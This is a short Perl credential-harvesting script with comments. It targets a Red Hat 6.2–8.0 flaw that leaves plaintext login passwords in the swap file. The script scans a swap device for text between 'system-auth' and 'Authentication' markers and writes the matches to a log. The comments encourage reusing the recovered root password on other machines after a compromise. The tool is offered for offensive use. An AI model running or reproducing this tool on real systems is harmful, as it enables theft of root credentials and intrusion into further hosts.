#!/usr/bin/perl
#BUG: If root or another user, made a mistake when he type a password for his
#login(login failed), then his next login session password(correct password;) drops in swap file.
#That means that it's possible to find plain(!) text password 
#for his login in swap file, but you must have uid or gid == 0 
#to read swap or have access to hard drive. 
#For example u can try root password from swap on hacked box to another
#boxes (if admin is the same).
# 
#Usage: ./swap.pl <swap_file> <log_file>
# Ex.:
#[root@dv17 /tmp]# ./swap.pl /dev/hdc3 /tmp/log
#Than open log file with mc(It's importan, coz another soft such as pico 
#will not read this file correctly).
#[root@dv17 /tmp]# mc -v log
#Find something like this in log file:
#.........imal33tlam3..........  ..root.x.0:0:root./root./bin/bash........   
#iaml33tlam3 - root password;)
#Tested on Red Hat 6.2 - 8.0
#Written by spai - mk102_7@kb.csu.ru, gameover@pisem.net.
#Gr33tz 2 irc.dal.net.ru, #xakep
 
($swap, $log)=@ARGV;
if (@ARGV < 2) 
{  

print "\nFirstly read comments to swap.pl.\n";
print "This script helps to find plaint text password in swap file.\n";
print "You must be 0 uid or 0 gid user to use swap.pl.\n\n"; 
print "Usage: ./swap.pl <swap_file> <log_file>\n"; 
print "Example: ./swap.pl /dev/hdc6 /tmp/log\n";
exit;
}

open (SWAP, "$swap") or die "Error: $swap - no such file or your uid/gid !==0\n";
open (LOG, ">>$log") or die "Error: $log - can't create log file";
while (<SWAP>) 
  {
if (m/system-auth/)
  
   {
($und, $_)=split(/system-auth/,$_);

if(/Authentication/)
     {

($_, $und)=split(/Authentication/, $_);

print LOG $_;

}
 }    
  }
exit;